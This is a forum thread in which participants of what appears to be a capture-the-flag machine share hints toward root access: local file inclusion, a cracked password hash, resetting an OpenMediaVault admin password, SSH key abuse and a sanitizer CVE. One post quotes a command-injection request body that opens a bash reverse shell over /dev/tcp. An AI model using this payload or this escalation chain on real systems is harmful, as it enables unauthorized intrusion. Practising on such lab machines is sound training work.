(November 22, 2022, 07:24 AM)meowmeowattack Wrote:

(November 22, 2022, 05:45 AM)deer Wrote:

(November 21, 2022, 07:48 PM)toinkz Wrote: How did the recently patched unintended privilege escalation Chrome Driver root work?

it is not patched still

---

(November 22, 2022, 04:43 AM)meowmeowattack Wrote:

(November 21, 2022, 09:32 PM)nuki Wrote:

Exa Wrote:I found the LFI. Any hint on what to do next?

Edit: I found development.sqlite3.

Cracking the hash of toby works pretty well, unfortunately it doesn't lead anywhere. 
I already tried bruteforcing the ssh login for the user associated to toby with a list of album names and artists from https://en.wikipedia.org/wiki/Toby_Wright

No success so far for the last couple of hours

the cracked hash can be used to login as openmediavault-webgui, but there doesn't seem to be anything exploitable by examining the version
in the /etc/openmediavault/config.xml, it does highlight two users, one does exist on the filesystem, one doesn't

if you have an ssh as openmediavault-webgui, I offer you a couple nudges

/usr/sbin/omv-firstaid

127.0.0.1:80

thanks, rails is in ssh group, hence creating a public/private key pair can login via ssh. then switch to openmediavault-webgui can reset omv admin password. now i suppose the omv web can be used to add a user with root privilege or promoting an existing user to root?

i got 403 forbidden =。=

(November 22, 2022, 05:45 AM)deer Wrote: if you have an ssh as openmediavault-webgui, I offer you a couple nudges

/usr/sbin/omv-firstaid

127.0.0.1:80

I could change the admin password by running /usr/sbin/omv-firstaid as the openmediavault-webgui user and then log into 127.0.0.1:80 (OpenMediaVault 6.0.27-1) as admin.

[quote="Exa" pid="842630" dateline="1669102537"]I tried to SSH as openmediavault-webgui with that password, but that didn't work.Anyway, @deer posted a nice summary. RCE via open(report_log) was the next step. Then su as openmediavault-webgui.[/quote]Maybe a RCE like this (with a netcat started locally):[quote]authenticity_token=0p4fReu74eXtUleAq5Cg8DTck3WDQl_2f3Po2RzncTwv2K3Wq0x8ffKN2XIHdbyCWIYaYTYpbwExaYVzgUna_w&report_log=|bash+-c+'bash+-i+>%26+/dev/tcp//+0>%261'[/quote]

(November 22, 2022, 08:15 AM)Exa Wrote:

(November 22, 2022, 05:45 AM)deer Wrote: if you have an ssh as openmediavault-webgui, I offer you a couple nudges

/usr/sbin/omv-firstaid

127.0.0.1:80

I could change the admin password by running /usr/sbin/omv-firstaid as the openmediavault-webgui user and then log into 127.0.0.1:80 (OpenMediaVault 6.0.27-1) as admin.

when changing the user groups, the app will return an "invalid context role". this error can be found in the omv source code in openmediavault/deb/openmediavault/usr/share/php/openmediavault/rpc/serviceabstract.inc downloaded here: https://github.com/openmediavault/openmediavault

on line 212, so the php code is complaining about the context["role"] is missing. i guess the author of this box deliberately removed it as an obstacle.

(November 22, 2022, 09:06 AM)meowmeowattack Wrote:

(November 22, 2022, 08:15 AM)Exa Wrote:

(November 22, 2022, 05:45 AM)deer Wrote: if you have an ssh as openmediavault-webgui, I offer you a couple nudges

/usr/sbin/omv-firstaid

127.0.0.1:80

I could change the admin password by running /usr/sbin/omv-firstaid as the openmediavault-webgui user and then log into 127.0.0.1:80 (OpenMediaVault 6.0.27-1) as admin.

when changing the user groups, the app will return an "invalid context role". this error can be found in the omv source code in openmediavault/deb/openmediavault/usr/share/php/openmediavault/rpc/serviceabstract.inc downloaded here: https://github.com/openmediavault/openmediavault

on line 212, so the php code is complaining about the context["role"] is missing. i guess the author of this box deliberately removed it as an obstacle.

Check /etc/openmediavault/config.xml. In the user section is something about ssh-keys ;)
Just got root

Any Hint what to do after i became admin of openmediavault?

---

Fuck, now they recreated my instance, i cannot create a admin user in the app anymore any ssh key for rails is also wiped. FUUUUCK

---

Restart. How can i become administrator in the webapp other than the known way by setting the role in the registration process? Any hint for me?

(November 22, 2022, 10:07 AM)s0jnik Wrote: Any Hint what to do after i became admin of openmediavault?

---

Fuck, now they recreated my instance, i cannot create a admin user in the app anymore any ssh key for rails is also wiped. FUUUUCK

---

Restart. How can i become administrator in the webapp other than the known way by setting the role in the registration process? Any hint for me?

What a pity, my box was reset too.

(November 22, 2022, 11:27 AM)Exa Wrote:

(November 22, 2022, 10:07 AM)s0jnik Wrote: Any Hint what to do after i became admin of openmediavault?

---

Fuck, now they recreated my instance, i cannot create a admin user in the app anymore any ssh key for rails is also wiped. FUUUUCK

---

Restart. How can i become administrator in the webapp other than the known way by setting the role in the registration process? Any hint for me?

What a pity, my box was reset too.

Me too, I'm just about to try that public key =. =, now start from scratch

---

Does anyone have the public key in /etc/openmediavault/config.xml

now start from scratch
Do you have a entry point already?

regarding xss for the entry point. i can find this information so far: rails-html-sanitizer 1.4.2 is vulnerable to cross-site scripting when `select` and `style` tags are allowed (CVE-2022-32209). it does look exploitable, but with the cookie being httponly, and there doesn't see to be any user role changing form, i fail to think of how this would help in this exercise.